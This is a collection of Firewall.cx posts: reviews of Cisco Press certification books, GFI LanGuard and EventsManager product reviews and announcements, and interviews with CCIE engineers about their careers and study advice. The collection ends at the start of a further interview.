The Cisco Press CCNP R&S v2.0 Official Cert Guide Library has been updated to reflect the latest CCNP R&S curriculum updates (2014) and is perhaps the only comprehensive study guide out there that can genuinely help you pass all three exams on your first try, saving money, time and unwanted disappointment. And ‘no’, this is not a sales pitch, as I personally used the library for my recently acquired CCNP R&S certification! I’ll be writing about my CCNP R&S certification path experience very soon on Firewall.cx.

The CCNP R&S v2 Library has been written by three well-known CCIE veteran engineers (Kevin Wallace, David Hucaby, Raymond Lacoste) and, with the help and care of Cisco Press, they’ve managed to produce the best CCNP R&S study guide out there. While the CCNP R&S Library is aimed at CCNP certification candidates, it can also serve as a great reference guide for those seeking to increase their knowledge of advanced networking topics and technologies and improve their troubleshooting skills.

The Cisco Press CCNP R&S v2 Library is not just a simple update to the previous study guide. Key topics for each of the three exams are now clearer than ever, with plentiful examples, great diagrams, finer presentation and analysis.

The CCNP Route exam (300-101) emphasizes a number of technologies and features that are also reflected in the ROUTE study guide book. IPv6 (dual-stack), EIGRP for IPv6 & OSPF for IPv6, RIPng (RIP for IPv6), NAT (IPv4 & IPv6) and VPN concepts (DMVPN and Easy VPN) are amongst the list of ‘hot’ topics covered in the ROUTE book. Similarly, the CCNP Switch exam (300-115) emphasizes, amongst other topics, Cisco StackWise, Virtual Switching System (VSS) and advanced Spanning Tree Protocol implementations – all of which are covered extensively in the SWITCH book.

Each of the three books is accompanied by a CD, containing over 200 practice questions (per CD) that are designed to help prepare the candidate for the real exam. Additional material on each CD includes memory table exercises and answer keys, a generous amount of videos, plus a study planner tool – that’s pretty much everything you’ll need for a successful preparation and achieving the ultimate goal: passing each exam.

Using the CCNP R&S v2 Library to help me prepare for each CCNP exam was the best thing I did after making the decision to pursue the CCNP certification. Now it’s proudly sitting amongst my other study guides and used occasionally when I need a refresh on complex networking topics.

  • Hits: 16368

GFI’s LANGUARD Update – The Most Trusted Patch Management Tool & Vulnerability Scanner Just Got Better!

GFI’s LanGuard is one of the world’s most popular and trusted patch management & vulnerability scanner products, designed to effectively monitor and manage networks of any size. IT Administrators, Network Engineers and IT Managers who have worked with LanGuard would surely agree that the above statement is no exaggeration.

Readers who haven’t heard of or worked with GFI’s LanGuard product should definitely visit our LanGuard 2014 product review, read about the features this unique network security product offers and download their free copy.

GFI recently released an update to LanGuard, taking the product to a whole new level by providing new key-features that have caught us by surprise.

Following is a short list of them:

  • Mobile device scanning:  customers can audit mobile devices that connect to Office 365, Google Apps and Apple Profile Manager.
  • Expanded vulnerability assessment for network devices: GFI LanGuard 2014 R2 offers vulnerability assessment of routers, printers and switches from the following vendors: Cisco, 3Com, Dell, SonicWALL, Juniper Networks, NETGEAR, Nortel, Alcatel, IBM and Linksys. 
  • CIPA compliance reports: additional reporting to ensure US schools and libraries adhere to the Children’s Internet Protection Act (CIPA). GFI LanGuard now has dedicated compliance reports for 11 security regulations and standards, including PCI DSS, HIPAA, SOX and PSN CoCo.
  • Support for Fedora: Fedora is the 7th Linux distribution supported by LanGuard for automatic patch management.
  • Chinese Localization: GFI LanGuard 2014 R2 is now also available in Chinese Traditional and Simplified versions.

One of the features we loved was the incredible support of Cisco products. With its latest release, GFI LanGuard supports over 1500 different Cisco products ranging from routers (including the newer ISR Gen 2), Catalyst switches (Layer2 & Layer3 switches), Cisco Nexus switches, Cisco Firewalls (PIX & ASA Series), VPN Gateways, Wireless Access points, IPS & IDS Sensors, Voice Gateways and much more!

  • Hits: 11171

CCIE Collaboration Quick Reference Review

Title:              CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ASIN:             B00KDIM9FI
Publisher:      Cisco Press
Published:     May 16, 2014
Edition:         1st Edition
Language:     English

Reviewer: Arani Mukherjee

Rating: 5/5 stars

This ebook has been designed for a specific target audience, as the title of the book suggests, so it cannot be faulted for not being suitable for all levels of Cisco expertise. Furthermore, since it is a quick reference, there is no scope for anything like poetic licence. As a quick reference, it achieves the two key aims:

1) Provide precise information
2) Do it in a structured format

And eliminate any complexity or ambiguity on the subject matter by adhering to these two key aims.

Readers of this review have to bear in mind that the review is not about the content/subject matter and its technical accuracy. This has already been achieved by the technical reviewer, as mentioned in the formative sections of the ebook. This review is all about how effectively the ebook manages to deliver key information to its users.

So, to follow up on that dictum, it would be wise to scan through how the material has been laid out.

It revolves around the Cisco Unified Communications (UC) workspace service infrastructure and explains what it stands for and how it delivers what it promises. So the first few chapters are all about the deployment of this service. Quality of Service (QoS) follows deployment; this chapter is dedicated entirely to ensuring the network infrastructure provides the classification policies and scheduling for multiple network traffic classes.

The next chapter is Telephony Standards and Protocols. This chapter talks about the various voice based protocols and their respective criteria. These include analog, digital and fax communication protocols.

From this point onwards the reference material concentrates purely on the Cisco Unified Communication platform. It discusses the relevant subsections of CUCM in the following line-up:

  • Cisco Unified Communications Manager
  • Cisco Unified Communications Security
  • Cisco Unity Connection
  • Cisco Unified Instant Messaging and Presence
  • Cisco Unified Contact Centre Express
  • Cisco IOS Unified Communications Applications &
  • Cisco Collaboration Network Management

In conclusion, what we need to prove or disprove are the key aims of a quick reference:

Does it provide precise information? - The answer is Yes. It does so due to the virtue that it is a reference guide. Information has to be precise as it would be used in situations where credibility or validity won't be questioned.

Does it do the above in a structured manner? - The answer is Yes. The layout of the chapters in its current form helps to achieve that. The trajectory of the discussion through the material ensures it as well.

Does it eliminate any complexity and ambiguity? - The answer again is Yes. This is technical reference material and not a philosophical debate penned down for the benefit of its readers. The author’s approach is very straightforward. It follows the natural order of events, from understanding the concept, deploying the technology and ensuring quality of the services, to managing the technology to provide a robust, efficient workspace environment.

In addition to the above, it needs to be mentioned that, since it is an eBook, users will find it easy to use from various mobile platforms like tablets or smartphones. It wouldn’t be easy to carry around a 315-page reference guide, even if it were printed on both sides of the paper!

For its target audience, this eBook will live up to its readers’ expectations and is highly recommended for anyone pursuing the CCIE Collaboration or CCNP Voice certification.

  • Hits: 15125

CCIE Collaboration Quick Reference Exam Guide

Title:             CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ISBN-10(13): 0-13-384596-6
Publisher:      Cisco Press
Published:      May  2014
Edition:          1st Edition
Language:      English

Rating: 5/5 stars

This title addresses the current CCIE Collaboration exam from both the written and the lab exam perspective. The title helps CCIE aspirants achieve the CCIE Collaboration certification and excel in their professional career. The ebook is now available for pre-order and is scheduled for release on 16 May 2014.
 
Here’s the excerpt from the Cisco Press website:

CCIE Collaboration Quick Reference provides you with detailed information, highlighting the key topics on the latest CCIE Collaboration v1.0 exam. This fact-filled Quick Reference allows you to get all-important information at a glance, helping you to focus your study on areas of weakness and to enhance memory retention of important concepts. With this book as your guide, you will review and reinforce your knowledge of and experience with collaboration solutions integration and operation, configuration, and troubleshooting in complex networks. You will also review the challenges of video, mobility, and presence as the foundation for workplace collaboration solutions. Topics covered include Cisco collaboration infrastructure, telephony standards and protocols, Cisco Unified Communications Manager (CUCM), Cisco IOS UC applications and features, Quality of Service and Security in Cisco collaboration solutions, Cisco Unity Connection, Cisco Unified Contact Center Express, and Cisco Unified IM and Presence.

This book provides a comprehensive final review for candidates taking the CCIE Collaboration v1.0 exam. It steps through exam objectives one-by-one, providing concise and accurate review for all topics. Using this book, exam candidates will be able to easily and effectively review test objectives without having to wade through numerous books and documents for relevant content for final review.

Table of Contents

Chapter 1 Cisco Collaboration Infrastructure
Chapter 2 Understanding Quality of Service
Chapter 3 Telephony Standards and Protocols
Chapter 4 Cisco Unified Communications Manager
Chapter 5 Cisco Unified Communications Security
Chapter 6 Cisco Unity Connection
Chapter 7 Cisco Unified IM Presence
Chapter 8 Cisco Unified Contact Center Express
Chapter 9 Cisco IOS UC Applications
Chapter 10 Cisco Collaboration Network Management

 If you are considering sitting for your CCIE Collaboration exam, then this is perhaps one of the most valuable resources you'll need to get your hands on!
  • Hits: 12707

Network Security Product Review: GFI LanGuard 2014 - The Ultimate Tool for Admins and IT Managers

Review by Arani Mukherjee

For a company’s IT department, it is essential to manage and monitor all assets with a high level of effectiveness, efficiency and transparency for users. Centralised management software becomes a crucial tool for the IT department to ensure that all assets are performing at their utmost efficiency, and that they are safeguarded from any anomalies, be it a virus attack or security holes created by unpatched software or even the OS.

GFI LanGuard is one such software package that promises to provide a consolidated platform from which software, network and security management can be performed, remotely, on all assets under its umbrella. A review of LanGuard version 2011 was published previously on Firewall.cx by our esteemed colleagues Alan Drury and John Watters. Here are our observations on the latest version, LanGuard 2014. This is something we would call a perspective from a fresh pair of eyes.

Installation

The installation phase has been made seamless by GFI. There are no major changes from the previous version. Worth noting is that, near the end of the installation, you will be asked to point towards an existing instance of SQL Server, or install one. This might prolong the entire process but, overall, it is a very tidy installation package. Our personal advice is to ensure the host server has a decent amount of memory and CPU speed to handle the sheer number-crunching needs of LanGuard.

First Look: The Dashboard

Once the installation is complete, LanGuard is ready to roll without the need for any OS restarts or a hardware reboot. For the purpose of this review two computers, one running Windows 7 and the other running Linux Ubuntu, were used. The Dashboard is the first main screen the user will encounter:

Figure: Main Screen

LanGuard will be able to pick up the machines it needs to monitor from the workgroup it belongs to. Obviously, it shows a lot of information at a glance. The Common Tasks section (lower left corner) is very useful for performing repetitive actions like triggering scans or adding computers. Adding computers can be done by looking into the existing domain, by computer name, or even by IP address. Once LanGuard identifies the computer, and knows more about it from scan results, it places it under the correct workgroup in the Entire Network section.

Below is what the Dashboard looked like for a single device or machine:

Figure: The Dashboard view for a single device

The Dashboard has several sub categories, but we’ll talk about them once we finish discussing the Scan option.

Scan Option

The purpose of this option is to perform the management scan of the assets that need to be monitored via LanGuard. Once the asset is selected, LanGuard will perform various types of scans, called audit operations. Each audit operation produces information under several sections for that device, ranging from hardware type and installed software to ports in use, patch information and so on.

The following screenshot displays a scan in progress on such a device:

Figure: LanGuard Scan Option

The progress of the Scan is shown at the top. The bottom section, with multiple tabs, lets the user know the various types of audit operations that are being handled. If any errors occur they appear in the Errors tab. This is very useful in terms of finding out if there are any latent issues with any device that might hamper LanGuard’s functions.

The Dashboard – Computers Tab

Once the Scan is complete, the Dashboard becomes more useful in terms of finding information about the devices. The Computers Tab is a list view of all such devices. The following screenshot shows how the various sections can be used to group and order the devices on the list:

Figure: LanGuard Computer Tab

Notice that just above the header named ‘Computer Information’, it asks the user to drag any column header to group the computers using that column. This is a unique feature. This goes to show that LanGuard has given the control of visibility to the user, instead of providing stock views. As well, every column header can be used to set filters. This means the user has multiple viewing options that can be adjusted depending on the need of the hour.

The Dashboard – History Tab

This tab is a listed historical view of all actions that have been taken on a given device. Every device’s functional history is shown, based on which computer has been selected on the left ‘Entire Network’ section. This is like an audit trail that can be used to track the functional progression of the computer. The following screenshot displays the historical data generated on the Windows 7 desktop that was used for our testing.

Figure: LanGuard History Tab

Information is sectioned in terms of date, and then further sectioned in terms of time stamps. We found the level of reporting to be very useful and easy to read.

The Dashboard – Vulnerabilities

This is perhaps one of the most important tabs under the Dashboard. At one glance you can find out the main weaknesses of the scanned machine. All such vulnerabilities are subdivided into types, based on their level of criticality. If the user selects a type, the actual list of issues comes up in the right hand panel.

Now if the user selects a single vulnerability, a clearer description appears at the bottom. LanGuard not only tells you about the weakness, it also provides valid recommendations on how to deal with it. Here’s a view of our test PC’s desktop’s weaknesses. Thanks to LanGuard, all of them were resolved!

Figure: LanGuard Vulnerabilities Tab

The Dashboard – Patches

Like the Vulnerabilities tab, the Patches tab shows the user the software updates and patches that are lacking on the target machine. Below is a screenshot demonstrating this:

Figure: LanGuard Patches Tab

Worth noting is the list of action buttons on the panel at the bottom right corner. The user has the option of acknowledging the patch issue or setting it to ‘ignore’. The ‘Remediate’ option is discussed later in this review.

The Dashboard – Ports Tab

The function of the Ports tab is to display which ports are open on the target machine. They are smartly divided into TCP and UDP ports. When the user selects either of the two divisions, the ports are listed in the right panel. Selecting a port displays the process which is using that port, along with the process path. From a network management point of view, with network security in mind, this is an excellent feature to have.

Figure: LanGuard Ports Tab

The Dashboard – Software Tab

This tab is a good representation of how well LanGuard scans the target machine and brings out information about it. Any software installed, along with version and authorisation, is listed. An IT manager can use this information to reveal any unauthorised software that might be in use on company machines. This makes absolute sense when it comes to safeguarding company assets from the hazards of pirated software:

Figure: LanGuard Software Tab

The Dashboard – Hardware Tab

The main purpose of the Hardware tab is titular, displaying the hardware components of the machines. The information provided is very detailed and can be very useful in maintaining a framework of similar hardware for the IT Infrastructure. LanGuard is very good at obtaining detailed information about a machine and presenting it in a very orderly fashion. Here’s what LanGuard presented in terms of hardware information:

Figure: LanGuard Hardware Tab

The Dashboard – System Information

LanGuard also provides user-specific information along with the services and shares on the machines. This shows all the processes and services running on the machines. It also shows all the various user profiles and the current users logged onto the machine. It can be used to see whether a user is present on a machine, list the shares, and identify them as authorised or not. The same can be done for the users that reside on that machine. As always, selecting an item in the System Information list on the right hand panel displays more details in the bottom panel.

Figure: LanGuard System Information Tab

Remediate Option

One of the key options in LanGuard, Remediate is there to ensure all important patches and upgrades necessary for your machines are delivered as and when required. As mentioned earlier in the Dashboard – Patches section, any upgrade or patch that is missing is listed with a Remediate option. Remediate not only lets the user deploy patches, it also helps in delivering bespoke software and malware protection. This is a vital core function as it ensures the security of the IT infrastructure along with its integrity. A quick look at the main screen for Remediate clearly shows its utility:

Figure: LanGuard Remediate Main Screen

The level of detail provided and the ease of operation was clearly evident.

Here’s a snapshot of the Software Updates screen. The layout speaks for itself:

Figure: LanGuard Deploy Software Updates Screen

Obviously, the user is allowed to pick and choose which updates to deploy and which ones to shelve for the time being.

Activity Monitor Option

This is more of an audit trail of all the actions, whether manually triggered or scheduled, that have been taken by LanGuard. This helps the user to find out if any scan or search has encountered any issues. This gives a bird’s eye view of how well LanGuard is working in the background to ensure the assets are being monitored properly.

The top left panel helps the user to select which audit trail needs to be seen and, based on that, the view dynamically changes to accommodate the relevant information. Here’s what it would look like if one wanted to see the trail of Security Scans:

LanGuard Activity Monitor Option

Reports Option

All the aforementioned information is only worth gathering if it can be presented in a way that supports commercial and technical decisions. That is where LanGuard presents us with a plethora of reporting options. The sheer volume of options was a bit overwhelming, but every report has its own merits. The screenshot below does not even show the bottom of the reports menu; there is a lot more to scroll through:

LanGuard Reports Option

Running the Network Security Report produced a presentation that covered every detail without being cluttered or confusing. Here’s what it looked like:

LanGuard Network Security Report

The graphical report was certainly eye catching.

Configuration Option

Clearly LanGuard has not shied away from giving users the power to tweak the software to their best advantage. Users can scan the network for devices and remotely deploy the agents which perform the repeated scheduled scans.

LanGuard Configuration Option

LanGuard was unable to scan the Ubuntu box properly and refused to deploy the agent, in spite of being given the right credentials.

A check on GFI’s website for the minimum supported Linux version showed that our Ubuntu release was two versions above the requirement. The scan could only recognise it as ‘Probably Unix’, and that’s the most LanGuard managed. We suspect the problem is related to the system's firewall and security settings.

The following message appeared on the Agent Dialog box when trying to deploy it on the Linux machine: “Not Supported for this Operating System”

Minor issues identifying our Linux workstation

Moving on to LanGuard’s latest offering: the ability to manage mobile devices. This is a new addition to LanGuard’s arsenal. It can manage and monitor mobile devices that use a Microsoft Exchange Server for email access, so company smartphones and tablets can be managed using this new tool. Here’s the interface:

LanGuard Managing Mobile Devices

Utilities Option

We call it the Swiss Army Knife for network management. One of our favourite sections, it includes quick and easy ways of checking the network features of any device or IP address. This just goes to prove that LanGuard is a very well thought out piece of software. Not only does it include mission-critical functions, it also provides a day-to-day point of mission control for the IT Manager.

We could not stop ourselves from performing a quick check on the output from the Whois option here:

LanGuard Whois using Utilities

The other options were pretty self-explanatory and of course very handy for a network manager.

Final Verdict

LanGuard provides an impressive set of tools. The process of adding machines, gathering information and then displaying that information is very efficient. The reporting is extremely resourceful and caters to practically every need an IT Manager could have. We hope the lack of support for Linux is an isolated incident. LanGuard has grabbed the attention of this reviewer to the point that he is willing to ask his own IT Manager what software his IT Department uses.

If it’s not LanGuard, there’s enough evidence here to put a case for this brilliant piece of software. LanGuard is a very good tool and should be part of an IT Manager’s or Administrator’s arsenal when it comes to managing a small to large enterprise IT Infrastructure.

 

 

 


Interview: Kevin Wallace CCIEx2 #7945 (Routing/Switching and Voice) & CCSI (Instructor) #20061

Kevin Wallace is a well-known name in the Cisco industry. Most Cisco engineers and Cisco certification candidates know Kevin from his Cisco Press titles and the popular Video Mentor training series. Today, Firewall.cx has the pleasure of interviewing Kevin and revealing how he managed to become one of the world's most popular CCIEs, which certification roadmap Cisco candidates should choose, which training method is best for your certification and much more.

Kevin Wallace, CCIEx2 (R/S and Voice) #7945, is a Certified Cisco Systems Instructor (CCSI #20061), and he holds multiple Cisco certifications, including CCNP Voice, CCSP, CCNP, and CCDP, in addition to multiple security and voice specializations. With Cisco experience dating back to 1989 (beginning with a Cisco AGS+ running Cisco IOS 7.x), Kevin has been a network design specialist for the Walt Disney World Resort, a senior technical instructor for SkillSoft/Thomson NETg/KnowledgeNet, and a network manager for Eastern Kentucky University. Kevin holds a Bachelor of Science degree in Electrical Engineering from the University of Kentucky. He lives in central Kentucky with his wife (Vivian) and two daughters (Stacie and Sabrina).

Firewall.cx Interview Questions

Q1. Hello Kevin and thanks for accepting Firewall.cx’s invitation. Can you tell us a bit about yourself, your career and daily routine as a CCIE (Voice) and Certified Cisco Systems Instructor (CCSI)?

Sure. As I was growing up, my father was the central office supervisor at the local GTE (General Telephone) office. So, I grew up in and around a telephone office. In college, I got a degree in Electrical Engineering, focusing on digital communications systems. Right out of college, I went to work for GTE Laboratories where I did testing of all kinds of telephony gear, everything from POTS (Plain Old Telephone Service) phones to payphones, key systems, PBX systems, and central office transmission equipment.

Then I went to work for a local university, thinking that I was going to be their PBX administrator but, to my surprise, they wanted me to build a data network from scratch, designed around a Cisco router. This was about 1989 and the router was a Cisco AGS+ router running Cisco IOS 7.x. And I just fell in love with it. I started doing more and more with Cisco routers and, later, Cisco Catalyst switches.

Also, if you know anything about my family and me you know we’re huge Disney fans and we actually moved from Kentucky to Florida where I was one of five Network Design Specialists for Walt Disney World. They had over 500 Cisco routers (if you count RSMs in Cat 5500s) and thousands of Cisco Catalyst switches. Working in the Magic Kingdom was an amazing experience.

However, due to a family health issue we had to move back to KY where I started teaching classes online for KnowledgeNet (a Cisco Learning Partner). This was in late 2000 and, even though we’ve been through a couple of acquisitions (first Thomson NETg and then Skillsoft), we’re still delivering Cisco authorized training live and online.

Being a Cisco trainer has been a dream job for me because it lets me stay immersed in Cisco technologies all the time. Of course I need, and want, to keep learning. I’m always in pursuit of some new certification. Just last year I earned my second CCIE, in Voice. My first CCIE, in Route/Switch, came way back in 2001.

In addition to teaching live online Cisco courses (mainly focused on voice technologies), I also write books and make videos for Cisco Press, and have been doing so for about the last ten years.

So, to answer your question about my daily routine: it’s a juggling act of course delivery and course development projects for Skillsoft and whatever book or video title I’m working on for Cisco Press.

Q2. We would like to hear your personal opinion on Firewall.cx’s technical articles covering Cisco technologies, VPN Security and CallManager Technologies. Would you recommend Firewall.cx to Cisco engineers and certification candidates around the world?

Firewall.cx has an amazing collection of free content. Much of the reference material is among the best I’ve ever seen. As just one example, the Protocol Map Cheat Sheet in the Downloads area is jaw-dropping. So, I would unhesitatingly recommend Firewall.cx to other Cisco professionals.

Q3. As a Cisco CCIE (Voice) and Certified Cisco Systems Instructor (CCSI) with more than 14 years experience, what preparation techniques do you usually recommend to students/engineers who are studying for Cisco certifications?

For me, it all starts with goal setting. What are you trying to achieve and why? If you don’t have a burning desire to achieve a particular certification, it’s too easy to run out of gas along your way.

You should also have a clear plan for how you intend to achieve your goal. “Mind mapping” is a tool that I find really useful for creating a plan. It might, for example, start with a goal to earn your CCNA. That main goal could then be broken down into subgoals such as purchasing a CCNA book from Cisco Press, building a home lab, joining an online study group, etc. Each of those subgoals could then be broken down even further.

Also, since I work for a Cisco Learning Partner (CLP), I’m convinced that attending a live training event is incredibly valuable in certification preparation. However, if a candidate’s budget doesn’t permit that, I recommend using Cisco Press books and resources on Cisco’s website to self-study. You’ve also got to “get your hands dirty” working on the gear. So, I’m a big fan of constructing a home lab.

When I was preparing for each of my CCIE certifications, I dipped into the family emergency fund in order to purchase the gear I needed to practice on. I was then able to sell the equipment, nearly at the original purchase price, when I finished my CCIE study.

But rather than me rattling on about how you should do this and that, let me recommend a super inexpensive book to your readers. It’s a book I wrote on being a success in your Cisco career. It’s called “Your Route to Cisco Career Success,” and it’s available as a Kindle download (for $2.99) from Amazon.com.

If anyone reading this doesn’t have a Kindle reader or app, the book is also available as a free .PDF from the Products page of my website, 1ExamAMonth.com/products.

Q4. In today’s fast paced technological era, which Cisco certifications do you believe can provide a candidate with the best job opportunities?

I often recommend that certification candidates do a search on a job website, such as dice.com or monster.com, for various Cisco certs to see what certifications are in demand in their geographical area.

However, since Cisco offers certifications in so many different areas, certification candidates can pick an area of focus that’s interesting to them. So, I wouldn’t want someone to pursue a certification path just because they thought there might be more job opportunities in that track if they didn’t have an interest and curiosity about that field.

Before picking a specific specialization, I do recommend that everyone demonstrate that they know routing and switching. So, my advice is to first get your CCNA in Routing and Switching and then get your CCNP. At that point, decide if you want to specialize in a specific technology area such as security or voice, or if you want to go even deeper in the Routing and Switching arena and get your CCIE R/S.

Q5. There is a steady rise on Cisco Voice certifications and especially the CCVP certification. What resources would you recommend to readers who are pursuing their CCVP certification that will help them prepare for their exams?

Interestingly, Cisco has changed the name of the CCVP certification to the CCNP Voice certification, and it’s made up of five exams: CVOICE, CIPT1, CIPT2, TVOICE and CAPPS. Since I teach all of these classes live and online, I think that’s the best preparation strategy. However, it is possible to self-study for those exams. Cisco Press offers comprehensive study guides for the CVOICE, CIPT1 and CIPT2 exams. However, you’ll need to rely on the exam blueprints for the TVOICE and CAPPS exams, where you take each blueprint topic and find a resource (maybe a book, maybe a video, or maybe a document on Cisco’s website) to help you learn that topic.

For hands-on experience, having a home lab is great. However, you could rent rack time from one of the CCIE Voice training providers or purchase a product like my CCNP Voice Video Lab Bundle, which includes over 70 videos of lab walkthroughs for $117.

Q6. What is your opinion on Video based certification training as opposed to text books – Self Study Guides?

Personally I use, and create, both types of study materials. Books are great for getting deep into the theory and for being a real-world reference. However, for me, there’s nothing like seeing something actually configured from start to finish and observing the results. When I was preparing for my CCIE Voice lab I would read about a configuration, but many times I didn’t fully understand it until I saw it performed in a training video.

So, to answer your question: instead of recommending one or the other, I recommend both.

We thank Kevin Wallace for his time and interview with Firewall.cx.

 

 


Interview: Vivek Tiwari CCIEx2 #18616 (CCIE Routing and Switching and Service Provider)

Vivek Tiwari holds a Bachelor’s degree in Physics, an MBA and many certifications from multiple vendors, including Cisco’s CCIE. With a double CCIE on the R&S and SP tracks under his belt, he mentors and coaches other engineers.

Vivek has been working in the Inter-networking industry for more than fifteen years, consulting for many Fortune 100 organizations. These include service providers, as well as multinational conglomerate corporations and the public sector. His five plus years of service with Cisco’s Advanced Services has gained him the respect and admiration of colleagues and customers alike.

His experience includes, but is not limited to, network architecture, training, operations, management and customer relations, which made him a sought after coach and mentor, as well as a recognized leader. 

He is also the author of the following titles:

“Your CCIE Lab Success Strategy the non-Technical guidebook”

“Stratégie pour réussir votre Laboratoire de CCIE”

“Your CCNA Success Strategy Learning by Immersing – Sink or Swim”

“Your CCNA Success Strategy the non-technical guidebook for Routing and Switching”

Q1.  Hello Vivek and thanks for accepting Firewall.cx’s invitation for this interview.   Can you let us know a bit more about your double CCIE area of expertise and how difficult the journey to achieve it was?

I have my CCIE in Routing and Switching and Service Provider technologies. The first CCIE journey was absolutely difficult. I was extremely disappointed when I failed my lab the first time. This is the only exam in my life that I had not passed the first time. However, that failure made me realize that CCIE is difficult but within my reach. I realized the mistakes I was making, persevered and eventually passed Routing and Switching CCIE in about a year’s time.

After the first CCIE I promised myself never to go through this again but my co-author Dean Bahizad convinced me to try a second CCIE and surprisingly it was much easier this time and I passed my Service Provider lab in less than a year’s time.

We have chronicled our story and documented the huge number of lessons learned in our book “Your CCIE Lab Success Strategy the non-technical guidebook”. This book has been reviewed by your website and, I am proud to state, has been helping engineers all over the globe.

Q2. As a globally recognised and respected Cisco professional, what do you believe is the true value of Firewall.cx toward its readers?

Firewall.cx is a gem for its readers globally. Every article that I have read to date on Firewall.cx is well thought out and contains great, detailed information. The accompanying diagrams are fantastic. The articles hold your attention and are well written; I have always read each one in full and have never left it halfway.

The reviews for books are also very objective and give you a feel for it. Overall this is a great service to the network engineer community.

Thanks for making this happen.

Q3. Could you describe your daily routine as a Cisco double CCIE?

My daily routine as a CCIE depends on the consulting role that I am playing at that time. I will describe a few of them:

Operations: being in operations you will always be on the lookout for what outages happened in the last 24 hours or in the last week. Find the detailed root cause for it and suggest improvements. These could range from a change in design of the network to putting in new processes or more training at the appropriate levels.

Architecture: As an architect you are always looking into the future and trying to interpret the current and future requirements of your customer. You then have to extrapolate these to make the network future-proof for at least 5 to 7 years. Once that is done, you have to weigh the expected network performance against the budget and see which parts of the network need enhancement and which need to be cut.

This involves lots of meetings and whiteboard sessions.

Mix of the Above: After the network is designed you have to be involved at a pilot site where you make your design work with selected operations engineers to implement the new network. This ensures knowledge transfer and also proves that the design that looked good on the board is also working as promised.

All of the above does need documentation so working with Visio, writing white papers, implementation procedures and training documents are also a part of the job. Many engineers don’t like this but it is essential.

Q4. There are thousands of engineers out there working on their CCNA, CCNP and CCVP certifications.  Which certification do you believe presents the biggest challenge to its candidates?

All certifications have their own challenges, and the challenge varies from one individual to another. However, in my mind the CCNA is extremely challenging if it is done the proper way. I say this because most candidates doing the CCNA are new to networking: they not only have to learn new concepts of IP addressing and routing, but also have to learn the language of typing all those commands and making them work on a Cisco device.

The sheer amount of learning makes it very challenging. Candidates are often stuck in a maze, running from one website to another or studying one book and then another without any real results. That is the reason we have provided a GPS for the CCNA, our book “Your CCNA exam Success Strategy the non-technical guidebook”.

I also want to point out that whenever we interview CCNA engineers many have the certificate but it seems they have not spent the time to learn and understand the technologies.

What they don’t understand is that if I am going to depend on them to run my network, which has cost my company millions of dollars, I would want a person with knowledge, not just a certificate.

Q5. What resources do you recommend for CCNA, CCNP, CCVP and CCIE candidates, apart from the well-known self-study books?

Apart from all the books, the other resources to have for sure are:

  1. A good lab. It could be made of real network gear or a simulator, but you should be able to run scenarios on it.
  2. Hands on practice in labs.
  3. Be curious while doing labs and try different options (only on the lab network please)
  4. A positive attitude to learning and continuous improvement.
    a) Write down every week what you have done to improve your skills
    b) Don’t be afraid to ask questions.
  5. Lastly and most important have a mentor. Follow the guidelines in our book about choosing a mentor and how to take full advantage of a mentor. Remember a mentor is not there to spoon feed you: a mentor is there to make sure you are moving in the right direction and in case you are stuck to show you a way out (not to push you out of it). A mentor is a guide not a chauffeur.

Q6. When looking at the work of other Cisco engineers, e.g network designs, configurations-setup etc, what do you usually search for when trying to identify a knowledgeable and experienced Cisco engineer?

I usually do not look at a design and try to find a flaw in it. I do make a note of design discrepancies that come to my mind. I say that from experience because what you see as a flaw might be a design requirement. For example, I have seen that some companies send all the traffic coming inside from the firewall across the data center to a dedicated server farm where it is analysed and then sent across to the different parts of the company. It is very inefficient and adds delay but it is by design.

I have seen many differences in QOS policies even between different groups within the organizations.

If a network design satisfies the legal, statutory and organization requirements then it is the best design.

Q7. What advice would you give to our readers who are eager to become No.1 in their professional community? Is studying and obtaining certifications enough or is there more to it?

Studying is important, but more important is to understand it and experience it. Obtaining certifications has become necessary now because that is one of the first ways a candidate can prove to a prospective employer that they have learnt the technologies. If an employer is going to let you work on a network where downtime will cost thousands of dollars per minute (think eBay, Amazon, PayPal, a car assembly line) or could even cost people's lives (think of a hospital network, the 911 emergency call network in the US, or the OnStar network), then they’d better be careful in hiring. I am sure you agree. Certification only gets you in the door for an interview; it is:

  • Your knowledge and understanding
  • Your experience
  • Your attitude towards your work
  • How well you work in teams
  • Which work-related areas are of interest to you (Security, Voice, Wireless etc.)

that get you the job and make you move ahead in your career.

The best way to move ahead and be No. 1 in your career is to do what you are passionate about. If you are pursuing your passion then it is not work anymore and you enjoy doing it and will excel beyond limits.

Another thing I would want to tell the readers is don’t chase money. Chase excellence in whatever you are doing and money will be the positive side effect of your excellence.

 


The New GFI EventsManager 2013 - Active Network and Server Monitoring

On the 21st of January 2013, GFI announced the new version of its popular GFI EventsManager, now named GFI EventsManager 2013.

For those who are unaware of the product, GFI EventsManager is one of the most popular software solutions that allows a network administrator, engineer or IT manager to actively monitor a whole IT infrastructure from a single intuitive interface.

Even though GFI EventsManager has been in continuous development, this time GFI has surprised us once again by introducing highly anticipated features that make this product a one-of-a-kind winner.

gfi-eventsmanager-2013-features-1

Below is a list of some of the new features included in GFI EventsManager 2013 that make this product a must for any company:

  • Active network and server monitoring based on monitoring checks is now available and can function in conjunction with the log based monitoring system in order to provide a complete and thorough view of the status of your environment.
  • The unique combination of active network and server monitoring through log-based network and server monitoring provides you not only with incident identification but also with a complete set of logs from the assets that failed, making problem investigation and solving much easier.
  • Enhanced console security helps comply with ‘best practice’ recommendations that require access to data on a “need-to-know” basis. Starting with this version, each GFI EventsManager user can be assigned a subset of computers that he/she manages, and the console will only allow access to the data coming from those configured computers while the user is logged in.
  • New schema for parsing XML files, available by default, that enables monitoring of XML–based logs and configuration files.
  • New schema for parsing DHCP text logs that enables monitoring of DHCP IP assignment.
  • More flexibility for storing events: the new database system has been updated to include physical deletion of events for easier maintenance and collection to remote databases.
  • Hashing of log data protects against attempts to tamper with the logs from outside the product, and enables enhanced log consolidation and security.
  • New reports for J-SOX and NERC CIP compliance.

Interview: Akhil Behl CCIEx2 #19564 (Voice & Security)

It's not every day you get the chance to interview a CCIE, and especially a double CCIE!  Today, Firewall.cx interviews Akhil Behl, a double CCIE (Voice & Security) #19564 and author of the popular Cisco Press title ‘Securing Cisco IP Telephony Networks'.

Akhil Behl's Biography

